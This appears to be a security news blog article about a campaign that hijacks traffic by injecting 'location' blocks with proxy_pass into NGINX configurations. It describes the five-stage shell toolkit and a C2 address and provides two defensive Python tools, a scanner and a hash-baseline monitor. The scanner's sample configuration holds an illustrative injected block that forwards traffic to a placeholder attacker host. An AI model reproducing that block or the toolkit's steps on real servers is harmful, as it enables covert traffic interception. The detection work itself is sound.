NGINX Server Hack: How Attackers Hijack User Traffic (2026)

Imagine your website suddenly sending visitors to a completely different, unknown place without you even knowing! That's precisely what's happening in a sophisticated cyberattack where hackers are compromising NGINX servers, effectively hijacking user traffic and rerouting it through their own hidden infrastructure. It’s a stealthy operation that can leave website owners and their users in the dark.

For those new to the scene, NGINX is a powerful, open-source tool that acts as a traffic manager for the web. Think of it as a super-efficient concierge for your website, handling connections between users and the server. It’s widely used for serving web pages, balancing incoming requests to prevent overload, caching content for faster delivery, and acting as a reverse proxy to shield your main servers.

This particular malicious campaign, brought to light by the sharp eyes at DataDog Security Labs, is targeting NGINX installations, especially those paired with Baota hosting management panels. The attackers seem to have a preference for sites with Asian top-level domains like .in, .id, .pe, .bd, and .th, as well as official .edu and .gov sites. This broad targeting suggests a wide net is being cast.

But here's where it gets clever and concerning: The attackers aren't breaking into NGINX through a traditional vulnerability. Instead, they're subtly altering existing NGINX configuration files. They inject malicious ‘location’ blocks, which are essentially rules that tell NGINX how to handle specific web addresses. These blocks are designed to intercept incoming requests for URLs chosen by the attackers. They then cleverly rewrite these requests to include the full original URL and, using the ‘proxy_pass’ directive, forward the traffic to domains controlled by the attackers.

Now, the ‘proxy_pass’ directive is a legitimate, everyday NGINX tool: it forwards requests to another server, and combined with upstream groups it distributes traffic for load balancing, better performance, or reliability. Because the attackers are using a feature that is already part of NGINX’s normal operation, the injected blocks are much less likely to trigger any security alarms. This is a key reason why these attacks have gone unnoticed for so long.

To make their hijacked traffic look as legitimate as possible, the attackers meticulously preserve crucial request headers like ‘Host’, ‘X-Real-IP’, ‘User-Agent’ and ‘Referer’. This makes the rerouted traffic appear as if it is coming from the original, trusted source.
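The pattern described above (a ‘location’ block that rewrites the request, preserves client headers and hands the traffic to an outside host via ‘proxy_pass’) is easy to describe but easy to miss in a long configuration. Below is an added example, not code from the article, from DataDog or from the NGINX project: a small scanner that parses an NGINX configuration and reports every ‘location’ block whose ‘proxy_pass’ target is neither a named upstream, loopback nor a private address, along with the ‘rewrite’ and ‘proxy_set_header’ directives that sit beside it. The sample configuration is constructed for the demonstration and the hostname attacker-proxy.example is a placeholder, not an indicator from the campaign.

```python
"""Report location blocks whose proxy_pass leaves the server's own infrastructure."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample vhost; attacker-proxy.example is a placeholder, not a real indicator.
SAMPLE_CONFIG = r"""
upstream app_backend {
    server 127.0.0.1:8080;
}

server {
    listen 80;
    server_name shop.example.in;

    location / {
        proxy_pass http://app_backend;
        proxy_set_header Host $host;
    }

    location /api/ {
        proxy_pass http://10.0.3.7:9000;
    }

    # Shape of an injected block: selected paths, original URL kept by the
    # rewrite, client headers preserved, traffic forwarded off-box.
    location ~ ^/(promo|offer)/ {
        rewrite ^ /$host$request_uri break;
        proxy_pass http://attacker-proxy.example;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header User-Agent $http_user_agent;
        proxy_set_header Referer $http_referer;
    }
}
"""

_TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|[{};]|[^\s{};"\']+')


def tokenize(text):
    """Split config text into tokens; a '#' comment runs to end of line
    (simplification: a '#' inside a quoted string is treated the same way)."""
    tokens = []
    for line in text.splitlines():
        tokens.extend(_TOKEN.findall(line.split("#", 1)[0]))
    return tokens


def parse(tokens):
    """Build a tree of (name, args, children); children is None for simple directives."""
    root, stack, current = [], [], []
    stack.append(root)
    for tok in tokens:
        if tok == ";":
            if current:
                stack[-1].append((current[0], current[1:], None))
            current = []
        elif tok == "{":
            if not current:
                raise ValueError("block without a directive name")
            block = []
            stack[-1].append((current[0], current[1:], block))
            stack.append(block)
            current = []
        elif tok == "}":
            if len(stack) == 1:
                raise ValueError("unbalanced '}' in configuration")
            stack.pop()
        else:
            current.append(tok.strip("'\""))
    if len(stack) != 1:
        raise ValueError("unterminated block in configuration")
    return root


def _iter(entries):
    """Yield every directive in the tree, depth first."""
    for entry in entries:
        yield entry
        if entry[2] is not None:
            yield from _iter(entry[2])


def proxy_host(target):
    """Host part of a proxy_pass argument; None for unix: sockets.
    A variable such as $backend comes back as-is and is flagged for review."""
    if target.startswith("unix:") or "://unix:" in target:
        return None
    if "://" not in target:
        target = "http://" + target
    return urlsplit(target).hostname


def is_internal(host, upstreams):
    """Named upstream, localhost, loopback or private address counts as 'ours'."""
    if host is None or host in upstreams or host == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_private


def _scan(entries, upstreams, findings):
    for name, args, children in entries:
        if children is None:
            continue
        if name == "location":
            for n, a, _c in children:
                if n == "proxy_pass" and a and not is_internal(proxy_host(a[0]), upstreams):
                    findings.append({
                        "location": " ".join(args),
                        "target": a[0],
                        "host": proxy_host(a[0]),
                        "rewrites": [" ".join(x) for m, x, _ in children if m == "rewrite"],
                        "forwarded_headers": [x[0] for m, x, _ in children
                                              if m == "proxy_set_header" and x],
                    })
        _scan(children, upstreams, findings)  # nested locations, server/http blocks


def find_external_proxies(config_text):
    """One finding per location block that proxies to a host outside the server."""
    tree = parse(tokenize(config_text))
    upstreams = {a[0] for n, a, _c in _iter(tree) if n == "upstream" and a}
    findings = []
    _scan(tree, upstreams, findings)
    return findings


if __name__ == "__main__":
    for f in find_external_proxies(SAMPLE_CONFIG):
        print(f"location {f['location']!r} -> {f['target']} "
              f"rewrites={f['rewrites']} headers={f['forwarded_headers']}")
```

Run it against the output of `nginx -T` (which prints the full, included configuration) rather than a single file, so blocks pulled in through `include` directives are covered too. A hit is a review item, not proof of compromise: a legitimate site may proxy to an external CDN or API, so the useful signal is an external target appearing in a block you did not write, especially one that also rewrites the path and forwards the original Host header.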

And this is the part most people miss: The entire attack process is orchestrated by a scripted, multi-stage toolkit. This isn't a simple one-off hack; it's a carefully planned operation with distinct phases:

  • Stage 1 – zx.sh: This is the mastermind script. It’s responsible for downloading and executing all the subsequent stages. It even has a clever fallback: if standard download tools like curl or wget aren't available, it can send raw HTTP requests over TCP to get the job done.
  • Stage 2 – bt.sh: This script specifically targets NGINX configurations managed by the Baota panel. It intelligently picks injection templates based on the server’s name and then safely overwrites the configuration. Crucially, it reloads NGINX in a way that aims to avoid any noticeable service interruption.
  • Stage 3 – 4zdh.sh: This stage is all about discovery and careful modification. It searches for common NGINX configuration file locations (like sites-enabled, conf.d, and sites-available). It uses sophisticated parsing tools to prevent corrupting the configuration files. It also checks for any previous injections by using hashing and a global mapping file, and most importantly, it validates the proposed changes using nginx -t before applying them and reloading the service.
  • Stage 4 – zdh.sh: This script takes a more focused approach, primarily targeting NGINX configurations in /etc/nginx/sites-enabled, with a particular emphasis on .in and .id domains. It follows a similar process of testing and reloading configurations, but it includes a forceful restart (pkill) as a last resort if needed.
  • Stage 5 – ok.sh: This is the final stage, where the attackers gather intelligence. It scans all the compromised NGINX configurations to build a comprehensive map of hijacked domains, the injection templates used, and the attacker’s proxy targets. All this valuable data is then sent back to a command-and-control (C2) server located at 158.94.210[.]227.

What makes this attack so insidious? It’s incredibly difficult to detect. Since no actual NGINX vulnerability is exploited, the malicious instructions are simply hidden within configuration files, which are often overlooked during routine security checks. Furthermore, because user traffic still reaches its intended destination – often directly – the fact that it briefly passes through an attacker’s infrastructure might go completely unnoticed unless very specific, granular monitoring is in place.
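Because the change lives entirely in configuration files that nobody re-reads, the simplest "granular monitoring" is a content-hash baseline of those files. The following is an added example, not code from the article or from NGINX: it snapshots the SHA-256 of every file under the configuration directories the toolkit is described as searching (sites-enabled, sites-available, conf.d), stores the baseline as JSON, and reports files that were added, modified or removed since. The `demo()` function builds a constructed scenario in a temporary directory so the example runs anywhere; the hostname proxy-host.invalid in it is a placeholder.

```python
"""Content-hash baseline for NGINX configuration directories."""
import hashlib
import json
import os
import tempfile
from pathlib import Path

# The search locations the article attributes to the toolkit; a defender
# baselines the same directories.
NGINX_CONFIG_DIRS = [
    "/etc/nginx/sites-enabled",
    "/etc/nginx/sites-available",
    "/etc/nginx/conf.d",
]


def sha256_file(path):
    """SHA-256 of a file's contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(directories):
    """Map every regular file under the directories (symlinks followed,
    since sites-enabled usually links into sites-available) to its hash."""
    result = {}
    for d in directories:
        for dirpath, _dirs, filenames in os.walk(str(d), followlinks=True):
            for name in filenames:
                p = os.path.join(dirpath, name)
                if os.path.isfile(p):
                    result[p] = sha256_file(p)
    return result


def diff_snapshots(baseline, current):
    """Files added, removed, or whose content hash changed."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(baseline) & set(current)
                           if baseline[p] != current[p]),
    }


def save_baseline(snap, path):
    with open(path, "w", encoding="utf-8") as f:
        json.dump(snap, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path, encoding="utf-8") as f:
        return json.load(f)


def demo():
    """Constructed scenario: baseline two directories, then one vhost gains a
    location block and a new file appears. Returns basenames only, so the
    result does not depend on the temporary path."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp, "sites-enabled")
        confd = Path(tmp, "conf.d")
        site.mkdir()
        confd.mkdir()
        vhost = site / "shop.example.in.conf"
        vhost.write_text("server {\n    listen 80;\n"
                         "    location / { proxy_pass http://127.0.0.1:8080; }\n}\n")
        (confd / "gzip.conf").write_text("gzip on;\n")
        baseline_path = Path(tmp, "baseline.json")
        save_baseline(snapshot([site, confd]), baseline_path)

        # Simulated later change to the configuration (placeholder host).
        with vhost.open("a") as f:
            f.write("location /promo/ { proxy_pass http://proxy-host.invalid; }\n")
        (confd / "extra.conf").write_text("# dropped in later\n")

        report = diff_snapshots(load_baseline(baseline_path), snapshot([site, confd]))
        return {k: [os.path.basename(p) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In production, write the baseline right after every deliberate configuration change (the deploy step that runs `nginx -t` is the natural place), keep it somewhere the web server's own account cannot write, and alert on any non-empty diff. Mtimes are not a substitute: a script can reset them, but it cannot make altered content hash the same.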

This situation raises a critical question: Are our web servers as secure as we think if they can be manipulated so subtly? And for website owners, how can you ensure your configurations are truly safe from such hidden threats?

What are your thoughts on this method of attack? Do you believe traditional security measures are sufficient against these kinds of configuration-based compromises? Let us know in the comments below!

Author: Duane Harber